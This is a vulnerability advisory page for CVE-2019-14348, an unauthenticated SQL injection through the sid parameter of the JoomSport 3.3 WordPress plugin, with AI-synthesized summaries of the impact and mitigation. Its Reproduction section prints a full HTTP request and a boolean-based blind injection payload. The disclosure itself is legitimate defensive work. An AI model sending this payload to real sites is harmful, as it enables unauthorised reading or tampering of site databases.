VYPR
← All advisories
Unrated severityNVD Advisory· Published Aug 5, 2019· Updated Aug 5, 2024

CVE-2019-14348

CVE-2019-14348

Description

SQL injection in BearDev JoomSport plugin 3.3 for WordPress allows attackers to steal, modify, or delete database data via the sid parameter.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

SQL injection in BearDev JoomSport plugin 3.3 for WordPress allows attackers to steal, modify, or delete database data via the sid parameter.

Vulnerability

The BearDev JoomSport plugin version 3.3 for WordPress contains a SQL injection vulnerability in the joomsport_season/new-yorkers/?action=playerlist endpoint. The sid parameter is not properly sanitized, allowing an attacker to inject arbitrary SQL queries. [1]

Exploitation

An unauthenticated attacker can exploit this by sending a crafted HTTP request to the vulnerable URL with a malicious sid parameter. The request does not require any prior authentication or user interaction. Public exploit code is available in the reference. [1]

Impact

Successful exploitation allows an attacker to steal, modify, or delete database information. This could result in a complete compromise of the WordPress site's data, including user credentials and sensitive content. [1]

Mitigation

No fix is disclosed in the available reference. Users should monitor for updates from the plugin vendor and consider disabling the plugin until a patch is applied. The plugin may have reached end-of-life status. [1]

References
  1. Packet Storm

AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

2

Patches

0

No patches discovered yet.

Vulnerability mechanics

Root cause

"The plugin fails to sanitize user-supplied input in the 'sid' parameter, allowing for SQL injection."

Attack vector

An attacker can exploit this vulnerability by sending a crafted POST request to the `joomsport_season/new-yorkers/?action=playerlist` endpoint. The request must include the `sid` parameter, which is vulnerable to SQL injection. By appending SQL code to the `sid` parameter, an attacker can manipulate database queries. The provided payload demonstrates a boolean-based blind SQL injection technique to confirm the vulnerability [ref_id=1].

Affected code

The vulnerability exists in the BearDev JoomSport plugin version 3.3. Specifically, requests containing the 'sid' parameter are vulnerable. The exploit details mention the endpoint `joomsport_season/new-yorkers/?action=playerlist` and the `sid` parameter within POST requests as the attack vector [ref_id=1].

What the fix does

The patch is not available in the provided documentation. The advisory indicates that the vulnerability is caused by improper handling of the 'sid' parameter. Remediation guidance would typically involve sanitizing or escaping the 'sid' parameter before it is used in database queries to prevent SQL injection.

Preconditions

  • inputThe 'sid' parameter in POST requests to the 'action=playerlist' endpoint.
  • configThe BearDev JoomSport plugin must be installed and active, specifically version 3.3.

Reproduction

POST /wordpress/joomsport_season/new-yorkers/?action=playerlist HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://localhost/wordpress/joomsport_season/new-yorkers/?action=playerlist Content-Type: application/x-www-form-urlencoded Content-Length: 22 DNT: 1 Connection: close Cookie: PHPSESSID=s010flbg7fbohnguabsvjaut40 Upgrade-Insecure-Requests: 1

sid=1&page=1&jscurtab=

Payload: sid=-3506 OR 7339=7339&page=1jscurtab=

Generated on Jun 4, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

3

News mentions

0

No linked articles in our index yet.